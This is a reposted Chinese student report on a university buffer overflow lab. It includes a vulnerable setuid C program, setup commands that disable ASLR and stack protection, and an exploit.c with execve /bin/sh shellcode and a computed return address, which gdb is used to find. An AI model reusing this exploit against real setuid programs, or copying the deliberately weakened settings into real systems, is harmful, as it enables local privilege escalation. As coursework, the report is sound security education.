2018-2019-1 20165314《信息安全系统设计基础》实验一 缓冲区溢出漏洞实验

实验目的

学习体验使用程序缓冲区溢出漏洞改变程序流控制，了解缓冲区漏洞的机理等。

实验环境配置：

输入命令安装一些用于编译32位C程序的软件包

$ sudo apt-get update

$ sudo apt-get install -y lib32z1 libc6-dev-i386

$ sudo apt-get install -y lib32readline-gplv2-dev

初始设置

1.关闭地址空间随机化功能。（此功能用于随机堆和栈的初始地址，使猜测准确的内存地址变得困难）

sudo sysctl -w kernel.randomize_va_space=0

2.为了进一步防范缓冲区溢出攻击及其它利用 shell 程序的攻击，许多shell程序在被调用时自动放弃它们的特权,不能在shell中保持root权限，这个防护措施在/bin/bash中实现。设置zsh程序

$ sudo su
$ cd /bin
$ ln -s zsh sh
$ exit

3.输入“linux32”，进入32位linux环境，输入“/bin/bash”使用bash

漏洞程序

1.在/tmp目录下新建一个stack.c文件

2.stack.c代码：

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

 int bof(char *str)
 {
 char buffer[12];
 strcpy(buffer, str);
 return 1;
 }       

 int main(int argc, char **argv)
 {
  char str[517];
  FILE *badfile;

 badfile = fopen("badfile", "r");
 fread(str, sizeof(char), 517, badfile);//读取一个名为“badfile”的文件。
 bof(str);//将文件内容装入到buffer中

 printf("Returned Properly\n");
 return 1;
 }

3.编译过程：

$ sudo su
$ gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c
$ chmod u+s stack
$ exit

• -g 参数是为了使编译后得到的可执行文档能用gdb调试
• GCC编译器有一种栈保护机制来阻止缓冲区溢出，所以我们在编译代码时需要用-fno-stack-protector关闭用来阻止缓存区溢出的栈保护机制，-z execstack用于允许执行栈

攻击

在/tmp目录下新建一个exploit.c文件

  #include <stdlib.h>
  #include <stdio.h>
  #include <string.h>

  char shellcode[] =
  "\x31\xc0" //xorl %eax,%eax
  "\x50"     //pushl %eax
  "\x68""//sh" //pushl $0x68732f2f
  "\x68""/bin"     //pushl $0x6e69622f
  "\x89\xe3" //movl %esp,%ebx
  "\x50"     //pushl %eax
  "\x53"     //pushl %ebx
  "\x89\xe1" //movl %esp,%ecx
  "\x99"     //cdq
  "\xb0\x0b" //movb $0x0b,%al
  "\xcd\x80" //int $0x80
  ;

  void main(int argc, char **argv)
  {
      char buffer[517];
      FILE *badfile;
      memset(&buffer, 0x90, 517);

      /* You need to fill the buffer with     appropriate contents here */
      strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??");   

      strcpy(buffer + 100, shellcode);   //将shellcode拷贝至buffer，偏移量设为了 100
      badfile = fopen("./badfile", "w");
      fwrite(buffer, 517, 1, badfile);
      fclose(badfile);
  }

\x??\x??\x??\x??处需要添上 shellcode 保存在内存中的地址，因为发生溢出后这个位置刚好可以覆盖返回地址。
strcpy(buffer+100,shellcode); 这句告诉我们，shellcode 保存在 buffer + 100 的位置。为了得到 shellcode 在内存中的地址，输入命令

  $gdb stack
  $disass main

接着输入命令

$b *0x080484e8
$r
$i r $esp

输入 r 后会Staring program
输入 i r $esp会显示 str 地址
然后按 q ,enter 退出调试
根据语句

strcpy(buffer + 100,shellcode)

计算 shellcode 的地址；0xffffd060(十六进制) + 0x64(100的十六进制) = 0xffffd0c4(十六进制)
修改exploit.c文件,将 \x??\x??\x??\x?? 修改为 \xc4\xd0\xff\xff，根据计算，我所使用的虚拟机的str地址为0xffffd060,exploit.c文件中的\x??\x??\x??\x??修改后内容为\xc4\xd0\xff\xff。

编译 exploit.c 程序

gcc -m32 -o exploit exploit.c

运行攻击程序exploit，再运行漏洞程序 stack，观察结果：

./exploit
./stack

输入whoami验证是否攻击成功

作业截图

1、输入$ sudo sysctl -w kernel.randomize_va_space=2打开系统的地址空间随机化机制，重复用 exploit 程序攻击 stack 程序，观察能否攻击成功，能否获得root权限。

2、将 /bin/sh 重新指向 /bin/bash（或/bin/dash），观察能否攻击成功，能否获得 root 权限。

实验中遇到的问题及解决方法

• 1 将stack.c生成在了主目录，以及某些未知的原因，导致在tmp目录中无法编译运行，并且只能以只读方式打开。
  解决方法：重新做了一遍实验。
• 2 不是很理解这个实验的攻击原理，实验结束后自己去百度下。

转载于:https://www.cnblogs.com/zhangshuai9345/p/9788099.html